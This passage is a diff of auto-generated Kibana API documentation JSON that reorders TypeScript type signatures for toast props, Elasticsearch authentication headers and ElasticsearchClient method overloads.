\"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", 
@@ -10162,7 +10162,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", 
@@ -14381,7 +14381,7 @@ "Headers used for authentication against Elasticsearch" ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; 
\"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; 
\"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; 
\"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-elasticsearch-server/index.d.ts", "deprecated": false 
@@ -15746,7 +15746,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the ES cluster on behalf of the Kibana internal user" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -15814,7 +15864,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -15840,33 +15890,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -15892,33 +15916,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -16878,6 +16876,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -20672,7 +20672,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the internal Kibana user." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -20740,7 +20790,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
